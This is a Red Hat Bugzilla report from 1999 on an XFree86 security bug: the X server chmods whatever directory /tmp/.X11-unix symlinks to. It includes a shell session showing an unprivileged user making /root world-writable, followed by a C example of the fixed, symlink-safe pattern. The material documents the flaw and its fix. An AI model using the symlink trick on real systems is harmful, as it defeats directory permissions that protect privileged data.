Bug 1816

Summary: XFree86 chmods directories symlinked from /tmp/.X11-unix
Product: [Retired] Red Hat Linux
Reporter: Bourne, Jim <jbourne>
Component: XFree86
Assignee: Preston Brown <pbrown>
Status: CLOSED CURRENTRELEASE
Severity: medium
Priority: high
Version: 5.2
CC: pbrown, wangsmo
Keywords: Security
Hardware: i386
OS: Linux
Doc Type: Bug Fix
Last Closed: 1999-03-30 21:01:00 UTC

Description Bourne, Jim 1999-03-26 16:04:29 UTC
Following a Bugtraq report of NetBSD X11 chmodding /root to
1777 by following a symlink in /tmp, I tried it under Linux.

This is an XFree86 bug, and because it sets the permissions
on /tmp/.X11-unix as root, the server will chmod any
directory symlinked from that directory in /tmp.

It has been confirmed on the i386 platform but will likely
affect all platforms.

********************** example ********************
bash$ id
uid=543(tester) gid=100(users) groups=100(users)
bash$ pwd
/home/tester
bash$ cd /tmp
bash$ ls -la
total 3
drwxrwxrwt   3 root     root         1024 Mar 25 19:11 .
drwxr-xr-x  18 root     root         1024 Mar 24 10:50 ..
bash$ ls -ld /root
drwx------   5 root     root         1024 Mar 25 19:02 /root
bash$ ln -sf /root .X11-unix
bash$ ls -l .X11-unix
lrwxrwxrwx   1 tester   users           5 Mar 25 19:47 .X11-unix -> /root
bash$ startx
(X output removed)
^C
waiting for X server to shut down

bash$ ls -ld /root
drwxrwxrwt   5 root     root         1024 Mar 25 19:47 /root

******************** end example *************************

I have also submitted this to XFree86.

Comment 1 Preston Brown 1999-03-29 17:21:59 UTC
Fixed in XFree86-3.3.3.1-31 and later.

Comment 2 Preston Brown 1999-03-29 17:23:59 UTC
We will be putting out a fix for XFree86 on Red Hat 4.x and 5.x later
today, in addition to the fixed package which exists in RawHide right
now.
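
The general hardening pattern for the bug reported above, as an added example that is not XFree86's actual patch or code from this report: instead of calling chmod() on a name in /tmp, open it with O_NOFOLLOW, verify it with fstat(), and fchmod() the descriptor. The function names, the owner check and the scratch-directory scenario are assumptions made for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Pre-fix pattern: chmod() resolves symlinks, so the mode lands on the target. */
int naive_socket_dir(const char *path)
{
    if (mkdir(path, 01777) == -1 && errno != EEXIST)
        return -1;
    return chmod(path, 01777);
}

/* Hardened pattern: pin the object with an fd, verify it, then fchmod(). */
int secure_socket_dir(const char *path)
{
    struct stat st;
    int fd, rc = -1;
    if (mkdir(path, 01777) == -1 && errno != EEXIST)
        return -1;
    /* O_NOFOLLOW refuses a final-component symlink, O_DIRECTORY a non-directory. */
    fd = open(path, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (fd == -1)
        return -1;
    /* Assumption: accept only a directory owned by the server's own uid (root
       for a setuid X server); one pre-created by another user is refused. */
    if (fstat(fd, &st) == 0 && S_ISDIR(st.st_mode) && st.st_uid == geteuid())
        rc = fchmod(fd, 01777); /* acts on the verified inode, not the name */
    close(fd);
    return rc;
}

/* Constructed scenario in a private scratch dir: a 0700 "victim" directory and a
   ".X11-unix" symlink to it. Returns victim's mode after setup() ran on the link. */
int victim_mode_after(int (*setup)(const char *))
{
    char base[] = "/tmp/sockdir-demo-XXXXXX", victim[64], lnk[64];
    struct stat st;
    if (!mkdtemp(base))
        return -1;
    snprintf(victim, sizeof victim, "%s/victim", base);
    snprintf(lnk, sizeof lnk, "%s/.X11-unix", base);
    if (mkdir(victim, 0700) == -1 || symlink(victim, lnk) == -1)
        return -1;
    setup(lnk);
    return stat(victim, &st) == 0 ? (int)(st.st_mode & 07777) : -1;
}
```

Calling `victim_mode_after(naive_socket_dir)` reproduces the mode change shown in the report against a scratch directory, while `victim_mode_after(secure_socket_dir)` leaves the victim at 0700.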